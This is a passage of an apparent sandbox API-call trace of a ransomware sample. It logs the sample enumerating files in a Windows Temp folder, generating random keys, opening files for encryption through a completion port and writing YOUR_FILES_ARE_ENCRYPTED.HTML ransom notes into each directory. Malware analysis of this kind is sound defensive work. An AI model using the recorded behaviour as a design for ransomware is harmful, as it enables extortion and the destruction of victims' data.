hTemplateFile=0x0) returned 0x308 [0122.160] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x19e7b8 | out: lpFileSize=0x19e7b8*=42525) returned 1 [0122.160] GetProcessHeap () returned 0x600000 [0122.160] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x3340008 [0122.160] wsprintfW (in: param_1=0x19e6d2, param_2="%02X" | out: param_1="F4") returned 2 [0122.160] wsprintfW (in: param_1=0x19e6d6, param_2="%02X" | out: param_1="0E") returned 2 [0122.160] wsprintfW (in: param_1=0x19e6da, param_2="%02X" | out: param_1="E9") returned 2 [0122.160] wsprintfW (in: param_1=0x19e6de, param_2="%02X" | out: param_1="1B") returned 2 [0122.160] wsprintfW (in: param_1=0x19e6e2, param_2="%02X" | out: param_1="56") returned 2 [0122.160] wsprintfW (in: param_1=0x19e6e6, param_2="%02X" | out: param_1="4B") returned 2 [0122.160] wsprintfW (in: param_1=0x19e6ea, param_2="%02X" | out: param_1="0E") returned 2 [0122.160] wsprintfW (in: param_1=0x19e6ee, param_2="%02X" | out: param_1="F2") returned 2 [0122.160] wsprintfW (in: param_1=0x19e6f2, param_2="%02X" | out: param_1="3F") returned 2 [0122.161] wsprintfW (in: param_1=0x19e6f6, param_2="%02X" | out: param_1="35") returned 2 [0122.161] wsprintfW (in: param_1=0x19e6fa, param_2="%02X" | out: param_1="55") returned 2 [0122.161] wsprintfW (in: param_1=0x19e6fe, param_2="%02X" | out: param_1="8D") returned 2 [0122.161] wsprintfW (in: param_1=0x19e702, param_2="%02X" | out: param_1="5B") returned 2 [0122.161] wsprintfW (in: param_1=0x19e706, param_2="%02X" | out: param_1="8E") returned 2 [0122.161] wsprintfW (in: param_1=0x19e70a, param_2="%02X" | out: param_1="2B") returned 2 [0122.161] wsprintfW (in: param_1=0x19e70e, param_2="%02X" | out: param_1="53") returned 2 [0122.161] wsprintfW (in: param_1=0x19e712, param_2="%02X" | out: param_1="46") returned 2 [0122.161] wsprintfW (in: param_1=0x19e716, param_2="%02X" | out: param_1="80") returned 2 [0122.161] wsprintfW (in: param_1=0x19e71a, param_2="%02X" | out: param_1="0F") returned 2 [0122.161] wsprintfW (in: param_1=0x19e71e, param_2="%02X" | out: param_1="75") returned 2 [0122.161] wsprintfW (in: param_1=0x19e722, param_2="%02X" | out: param_1="98") returned 2 [0122.161] wsprintfW (in: param_1=0x19e726, param_2="%02X" | out: param_1="D5") returned 2 [0122.161] wsprintfW (in: param_1=0x19e72a, param_2="%02X" | out: param_1="5A") returned 2 [0122.161] wsprintfW (in: param_1=0x19e72e, param_2="%02X" | out: param_1="9B") returned 2 [0122.161] wsprintfW (in: param_1=0x19e732, param_2="%02X" | out: param_1="7A") returned 2 [0122.161] wsprintfW (in: param_1=0x19e736, param_2="%02X" | out: param_1="07") returned 2 [0122.161] wsprintfW (in: param_1=0x19e73a, param_2="%02X" | out: param_1="E7") returned 2 [0122.161] wsprintfW (in: param_1=0x19e73e, param_2="%02X" | out: param_1="74") returned 2 [0122.161] wsprintfW (in: param_1=0x19e742, param_2="%02X" | out: param_1="7A") returned 2 [0122.161] wsprintfW (in: param_1=0x19e746, param_2="%02X" | out: param_1="13") returned 2 [0122.161] wsprintfW (in: param_1=0x19e74a, param_2="%02X" | out: param_1="DE") returned 2 [0122.161] wsprintfW (in: param_1=0x19e74e, param_2="%02X" | out: param_1="7A") returned 2 [0122.162] lstrcpyW (in: lpString1=0x33500bc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\MyrMx1J.png" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\MyrMx1J.png") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\MyrMx1J.png" [0122.162] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x274, CompletionKey=0x3340008, NumberOfConcurrentThreads=0x0) returned 0x274 [0122.162] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x3340008, lpOverlapped=0x3340008) returned 1 [0122.167] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x86644b40, ftCreationTime.dwHighDateTime=0x1d7095c, ftLastAccessTime.dwLowDateTime=0x402b6460, ftLastAccessTime.dwHighDateTime=0x1d7099d, ftLastWriteTime.dwLowDateTime=0x402b6460, ftLastWriteTime.dwHighDateTime=0x1d7099d, nFileSizeHigh=0x0, nFileSizeLow=0x3003, dwReserved0=0x19e94c, dwReserved1=0x39f712c, cFileName="N eZZURmexiQEMP0.m4a", cAlternateFileName="NEZZUR~1.M4A")) returned 1 [0122.167] StrStrIW (lpFirst="N eZZURmexiQEMP0.m4a", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0122.167] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\N eZZURmexiQEMP0.m4a") returned 65 [0122.167] PathFindExtensionW (pszPath="N eZZURmexiQEMP0.m4a") returned=".m4a" [0122.167] lstrlenW (lpString=".m4a") returned 4 [0122.167] PathFindExtensionW (pszPath="N eZZURmexiQEMP0.m4a") returned=".m4a" [0122.167] SystemFunction036 (in: RandomBuffer=0x19e794, RandomBufferLength=0x20 | out: RandomBuffer=0x19e794) returned 1 [0122.167] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\N eZZURmexiQEMP0.m4a" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\n ezzurmexiqemp0.m4a"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x308 [0122.168] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x19e7b8 | out: lpFileSize=0x19e7b8*=12291) returned 1 [0122.168] GetProcessHeap () returned 0x600000 [0122.168] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x3340008 [0122.170] wsprintfW (in: param_1=0x19e6d2, param_2="%02X" | out: param_1="7E") returned 2 [0122.170] wsprintfW (in: param_1=0x19e6d6, param_2="%02X" | out: param_1="D4") returned 2 [0122.170] wsprintfW (in: param_1=0x19e6da, param_2="%02X" | out: param_1="7C") returned 2 [0122.170] wsprintfW (in: param_1=0x19e6de, param_2="%02X" | out: param_1="10") returned 2 [0122.170] wsprintfW (in: param_1=0x19e6e2, param_2="%02X" | out: param_1="10") returned 2 [0122.170] wsprintfW (in: param_1=0x19e6e6, param_2="%02X" | out: param_1="A2") returned 2 [0122.170] wsprintfW (in: param_1=0x19e6ea, param_2="%02X" | out: param_1="72") returned 2 [0122.170] wsprintfW (in: param_1=0x19e6ee, param_2="%02X" | out: param_1="01") returned 2 [0122.170] wsprintfW (in: param_1=0x19e6f2, param_2="%02X" | out: param_1="C2") returned 2 [0122.170] wsprintfW (in: param_1=0x19e6f6, param_2="%02X" | out: param_1="5B") returned 2 [0122.170] wsprintfW (in: param_1=0x19e6fa, param_2="%02X" | out: param_1="CC") returned 2 [0122.170] wsprintfW (in: param_1=0x19e6fe, param_2="%02X" | out: param_1="D7") returned 2 [0122.170] wsprintfW (in: param_1=0x19e702, param_2="%02X" | out: param_1="B2") returned 2 [0122.170] wsprintfW (in: param_1=0x19e706, param_2="%02X" | out: param_1="BD") returned 2 [0122.171] wsprintfW (in: param_1=0x19e70a, param_2="%02X" | out: param_1="5C") returned 2 [0122.171] wsprintfW (in: param_1=0x19e70e, param_2="%02X" | out: param_1="42") returned 2 [0122.171] wsprintfW (in: param_1=0x19e712, param_2="%02X" | out: param_1="58") returned 2 [0122.171] wsprintfW (in: param_1=0x19e716, param_2="%02X" | out: param_1="B8") returned 2 [0122.171] wsprintfW (in: param_1=0x19e71a, param_2="%02X" | out: param_1="67") returned 2 [0122.171] wsprintfW (in: param_1=0x19e71e, param_2="%02X" | out: param_1="EB") returned 2 [0122.171] wsprintfW (in: param_1=0x19e722, param_2="%02X" | out: param_1="68") returned 2 [0122.172] wsprintfW (in: param_1=0x19e726, param_2="%02X" | out: param_1="1D") returned 2 [0122.172] wsprintfW (in: param_1=0x19e72a, param_2="%02X" | out: param_1="E5") returned 2 [0122.172] wsprintfW (in: param_1=0x19e72e, param_2="%02X" | out: param_1="82") returned 2 [0122.172] wsprintfW (in: param_1=0x19e732, param_2="%02X" | out: param_1="46") returned 2 [0122.172] wsprintfW (in: param_1=0x19e736, param_2="%02X" | out: param_1="9D") returned 2 [0122.172] wsprintfW (in: param_1=0x19e73a, param_2="%02X" | out: param_1="52") returned 2 [0122.172] wsprintfW (in: param_1=0x19e73e, param_2="%02X" | out: param_1="9D") returned 2 [0122.172] wsprintfW (in: param_1=0x19e742, param_2="%02X" | out: param_1="5F") returned 2 [0122.172] wsprintfW (in: param_1=0x19e746, param_2="%02X" | out: param_1="71") returned 2 [0122.172] wsprintfW (in: param_1=0x19e74a, param_2="%02X" | out: param_1="E8") returned 2 [0122.172] wsprintfW (in: param_1=0x19e74e, param_2="%02X" | out: param_1="58") returned 2 [0122.172] lstrcpyW (in: lpString1=0x33500bc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\N eZZURmexiQEMP0.m4a" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\N eZZURmexiQEMP0.m4a") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\N eZZURmexiQEMP0.m4a" [0122.172] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x274, CompletionKey=0x3340008, NumberOfConcurrentThreads=0x0) returned 0x274 [0122.172] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x3340008, lpOverlapped=0x3340008) returned 1 [0122.176] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3a597368, ftCreationTime.dwHighDateTime=0x1d70699, ftLastAccessTime.dwLowDateTime=0x3a597368, ftLastAccessTime.dwHighDateTime=0x1d70699, ftLastWriteTime.dwLowDateTime=0x3a597368, ftLastWriteTime.dwHighDateTime=0x1d70699, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e94c, dwReserved1=0x39f712c, cFileName="outlook logging", cAlternateFileName="OUTLOO~1")) returned 1 [0122.176] StrStrIW (lpFirst="outlook logging", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0122.176] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\outlook logging") returned 60 [0122.176] GetProcessHeap () returned 0x600000 [0122.176] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0122.177] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\outlook logging" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\outlook logging") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\outlook logging" [0122.177] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\outlook logging", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\outlook logging\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\outlook logging\\*" [0122.177] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\outlook logging\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3a597368, ftCreationTime.dwHighDateTime=0x1d70699, ftLastAccessTime.dwLowDateTime=0x3a597368, ftLastAccessTime.dwHighDateTime=0x1d70699, ftLastWriteTime.dwLowDateTime=0x3a5bd07f, ftLastWriteTime.dwHighDateTime=0x1d70699, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e638, dwReserved1=0x37af913, cFileName=".", cAlternateFileName="")) returned 0x626778 [0122.178] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3a597368, ftCreationTime.dwHighDateTime=0x1d70699, ftLastAccessTime.dwLowDateTime=0x3a597368, ftLastAccessTime.dwHighDateTime=0x1d70699, ftLastWriteTime.dwLowDateTime=0x3a5bd07f, ftLastWriteTime.dwHighDateTime=0x1d70699, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e638, dwReserved1=0x37af913, cFileName="..", cAlternateFileName="")) returned 1 [0122.178] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3a5bd07f, ftCreationTime.dwHighDateTime=0x1d70699, ftLastAccessTime.dwLowDateTime=0x3a5bd07f, ftLastAccessTime.dwHighDateTime=0x1d70699, ftLastWriteTime.dwLowDateTime=0x6664f20f, ftLastWriteTime.dwHighDateTime=0x1d70699, nFileSizeHigh=0x0, nFileSizeLow=0x17d, dwReserved0=0x19e638, dwReserved1=0x37af913, cFileName="firstrun.log", cAlternateFileName="")) returned 1 [0122.178] StrStrIW (lpFirst="firstrun.log", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0122.178] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\outlook logging\\firstrun.log") returned 73 [0122.178] PathFindExtensionW (pszPath="firstrun.log") returned=".log" [0122.178] lstrlenW (lpString=".log") returned 4 [0122.178] PathFindExtensionW (pszPath="firstrun.log") returned=".log" [0122.178] SystemFunction036 (in: RandomBuffer=0x19e480, RandomBufferLength=0x20 | out: RandomBuffer=0x19e480) returned 1 [0122.178] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\outlook logging\\firstrun.log" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\outlook logging\\firstrun.log"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x318 [0122.179] GetFileSizeEx (in: hFile=0x318, lpFileSize=0x19e4a4 | out: lpFileSize=0x19e4a4*=381) returned 1 [0122.179] CloseHandle (hObject=0x318) returned 1 [0122.179] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3a5bd07f, ftCreationTime.dwHighDateTime=0x1d70699, ftLastAccessTime.dwLowDateTime=0x3a5bd07f, ftLastAccessTime.dwHighDateTime=0x1d70699, ftLastWriteTime.dwLowDateTime=0x6664f20f, ftLastWriteTime.dwHighDateTime=0x1d70699, nFileSizeHigh=0x0, nFileSizeLow=0x17d, dwReserved0=0x19e638, dwReserved1=0x37af913, cFileName="firstrun.log", cAlternateFileName="")) returned 0 [0122.179] FindClose (in: hFindFile=0x626778 | out: hFindFile=0x626778) returned 1 [0122.179] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\outlook logging\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 90 [0122.179] GetProcessHeap () returned 0x600000 [0122.179] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3153030 [0122.179] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\outlook logging\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\outlook logging\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0122.180] WriteFile (in: hFile=0x308, lpBuffer=0x3153030*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e7a4, lpOverlapped=0x0 | out: lpBuffer=0x3153030*, lpNumberOfBytesWritten=0x19e7a4*=0x3c00, lpOverlapped=0x0) returned 1 [0122.181] CloseHandle (hObject=0x308) returned 1 [0122.181] GetProcessHeap () returned 0x600000 [0122.182] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3153030 | out: hHeap=0x600000) returned 1 [0122.182] GetProcessHeap () returned 0x600000 [0122.182] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0122.182] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb29666c0, ftCreationTime.dwHighDateTime=0x1d6fec2, ftLastAccessTime.dwLowDateTime=0x27c45a80, ftLastAccessTime.dwHighDateTime=0x1d704cf, ftLastWriteTime.dwLowDateTime=0x27c45a80, ftLastWriteTime.dwHighDateTime=0x1d704cf, nFileSizeHigh=0x0, nFileSizeLow=0xb09c, dwReserved0=0x19e94c, dwReserved1=0x39f712c, cFileName="q51Sk6kjBCjcsj73ADD.m4a", cAlternateFileName="Q51SK6~1.M4A")) returned 1 [0122.182] StrStrIW (lpFirst="q51Sk6kjBCjcsj73ADD.m4a", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0122.182] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\q51Sk6kjBCjcsj73ADD.m4a") returned 68 [0122.182] PathFindExtensionW (pszPath="q51Sk6kjBCjcsj73ADD.m4a") returned=".m4a" [0122.182] lstrlenW (lpString=".m4a") returned 4 [0122.182] PathFindExtensionW (pszPath="q51Sk6kjBCjcsj73ADD.m4a") returned=".m4a" [0122.182] SystemFunction036 (in: RandomBuffer=0x19e794, RandomBufferLength=0x20 | out: RandomBuffer=0x19e794) returned 1 [0122.182] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\q51Sk6kjBCjcsj73ADD.m4a" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\q51sk6kjbcjcsj73add.m4a"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x308 [0122.183] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x19e7b8 | out: lpFileSize=0x19e7b8*=45212) returned 1 [0122.183] GetProcessHeap () returned 0x600000 [0122.183] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x3340008 [0122.184] wsprintfW (in: param_1=0x19e6d2, param_2="%02X" | out: param_1="23") returned 2 [0122.184] wsprintfW (in: param_1=0x19e6d6, param_2="%02X" | out: param_1="DB") returned 2 [0122.184] wsprintfW (in: param_1=0x19e6da, param_2="%02X" | out: param_1="3E") returned 2 [0122.184] wsprintfW (in: param_1=0x19e6de, param_2="%02X" | out: param_1="E3") returned 2 [0122.184] wsprintfW (in: param_1=0x19e6e2, param_2="%02X" | out: param_1="D5") returned 2 [0122.184] wsprintfW (in: param_1=0x19e6e6, param_2="%02X" | out: param_1="06") returned 2 [0122.184] wsprintfW (in: param_1=0x19e6ea, param_2="%02X" | out: param_1="01") returned 2 [0122.184] wsprintfW (in: param_1=0x19e6ee, param_2="%02X" | out: param_1="11") returned 2 [0122.184] wsprintfW (in: param_1=0x19e6f2, param_2="%02X" | out: param_1="C7") returned 2 [0122.184] wsprintfW (in: param_1=0x19e6f6, param_2="%02X" | out: param_1="E2") returned 2 [0122.184] wsprintfW (in: param_1=0x19e6fa, param_2="%02X" | out: param_1="EF") returned 2 [0122.184] wsprintfW (in: param_1=0x19e6fe, param_2="%02X" | out: param_1="58") returned 2 [0122.184] wsprintfW (in: param_1=0x19e702, param_2="%02X" | out: param_1="2D") returned 2 [0122.184] wsprintfW (in: param_1=0x19e706, param_2="%02X" | out: param_1="0B") returned 2 [0122.184] wsprintfW (in: param_1=0x19e70a, param_2="%02X" | out: param_1="C4") returned 2 [0122.184] wsprintfW (in: param_1=0x19e70e, param_2="%02X" | out: param_1="31") returned 2 [0122.184] wsprintfW (in: param_1=0x19e712, param_2="%02X" | out: param_1="DB") returned 2 [0122.185] wsprintfW (in: param_1=0x19e716, param_2="%02X" | out: param_1="C9") returned 2 [0122.185] wsprintfW (in: param_1=0x19e71a, param_2="%02X" | out: param_1="96") returned 2 [0122.185] wsprintfW (in: param_1=0x19e71e, param_2="%02X" | out: param_1="6D") returned 2 [0122.185] wsprintfW (in: param_1=0x19e722, param_2="%02X" | out: param_1="6D") returned 2 [0122.185] wsprintfW (in: param_1=0x19e726, param_2="%02X" | out: param_1="96") returned 2 [0122.185] wsprintfW (in: param_1=0x19e72a, param_2="%02X" | out: param_1="49") returned 2 [0122.185] wsprintfW (in: param_1=0x19e72e, param_2="%02X" | out: param_1="DD") returned 2 [0122.185] wsprintfW (in: param_1=0x19e732, param_2="%02X" | out: param_1="B6") returned 2 [0122.185] wsprintfW (in: param_1=0x19e736, param_2="%02X" | out: param_1="B8") returned 2 [0122.185] wsprintfW (in: param_1=0x19e73a, param_2="%02X" | out: param_1="12") returned 2 [0122.185] wsprintfW (in: param_1=0x19e73e, param_2="%02X" | out: param_1="11") returned 2 [0122.185] wsprintfW (in: param_1=0x19e742, param_2="%02X" | out: param_1="38") returned 2 [0122.185] wsprintfW (in: param_1=0x19e746, param_2="%02X" | out: param_1="71") returned 2 [0122.185] wsprintfW (in: param_1=0x19e74a, param_2="%02X" | out: param_1="83") returned 2 [0122.185] wsprintfW (in: param_1=0x19e74e, param_2="%02X" | out: param_1="1D") returned 2 [0122.185] lstrcpyW (in: lpString1=0x33500bc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\q51Sk6kjBCjcsj73ADD.m4a" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\q51Sk6kjBCjcsj73ADD.m4a") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\q51Sk6kjBCjcsj73ADD.m4a" [0122.185] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x274, CompletionKey=0x3340008, NumberOfConcurrentThreads=0x0) returned 0x274 [0122.185] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x3340008, lpOverlapped=0x3340008) returned 1 [0122.187] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x66a5247c, ftCreationTime.dwHighDateTime=0x1d70699, ftLastAccessTime.dwLowDateTime=0x66a5247c, ftLastAccessTime.dwHighDateTime=0x1d70699, ftLastWriteTime.dwLowDateTime=0x66a5247c, ftLastWriteTime.dwHighDateTime=0x1d70699, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e94c, dwReserved1=0x39f712c, cFileName="VBE", cAlternateFileName="")) returned 1 [0122.190] StrStrIW (lpFirst="VBE", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0122.190] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\VBE") returned 48 [0122.190] GetProcessHeap () returned 0x600000 [0122.190] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0122.190] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\VBE" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\VBE") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\VBE" [0122.190] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\VBE", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\VBE\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\VBE\\*" [0122.190] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\VBE\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x66a5247c, ftCreationTime.dwHighDateTime=0x1d70699, ftLastAccessTime.dwLowDateTime=0x66a5247c, ftLastAccessTime.dwHighDateTime=0x1d70699, ftLastWriteTime.dwLowDateTime=0x66a5247c, ftLastWriteTime.dwHighDateTime=0x1d70699, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e638, dwReserved1=0x12fa36c, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0122.191] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x66a5247c, ftCreationTime.dwHighDateTime=0x1d70699, ftLastAccessTime.dwLowDateTime=0x66a5247c, ftLastAccessTime.dwHighDateTime=0x1d70699, ftLastWriteTime.dwLowDateTime=0x66a5247c, ftLastWriteTime.dwHighDateTime=0x1d70699, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e638, dwReserved1=0x12fa36c, cFileName="..", cAlternateFileName="")) returned 1 [0122.191] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x66a5247c, ftCreationTime.dwHighDateTime=0x1d70699, ftLastAccessTime.dwLowDateTime=0x66a5247c, ftLastAccessTime.dwHighDateTime=0x1d70699, ftLastWriteTime.dwLowDateTime=0x66a5247c, ftLastWriteTime.dwHighDateTime=0x1d70699, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e638, dwReserved1=0x12fa36c, cFileName="..", cAlternateFileName="")) returned 0 [0122.191] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0122.191] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\VBE\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 78 [0122.191] GetProcessHeap () returned 0x600000 [0122.191] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3153030 [0122.191] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\VBE\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\vbe\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0122.192] WriteFile (in: hFile=0x308, lpBuffer=0x3153030*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e7a4, lpOverlapped=0x0 | out: lpBuffer=0x3153030*, lpNumberOfBytesWritten=0x19e7a4*=0x3c00, lpOverlapped=0x0) returned 1 [0122.193] CloseHandle (hObject=0x308) returned 1 [0122.193] GetProcessHeap () returned 0x600000 [0122.194] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3153030 | out: hHeap=0x600000) returned 1 [0122.194] GetProcessHeap () returned 0x600000 [0122.194] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0122.194] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ddf2eb0, ftCreationTime.dwHighDateTime=0x1d6fc4f, ftLastAccessTime.dwLowDateTime=0x3a19fc40, ftLastAccessTime.dwHighDateTime=0x1d70172, 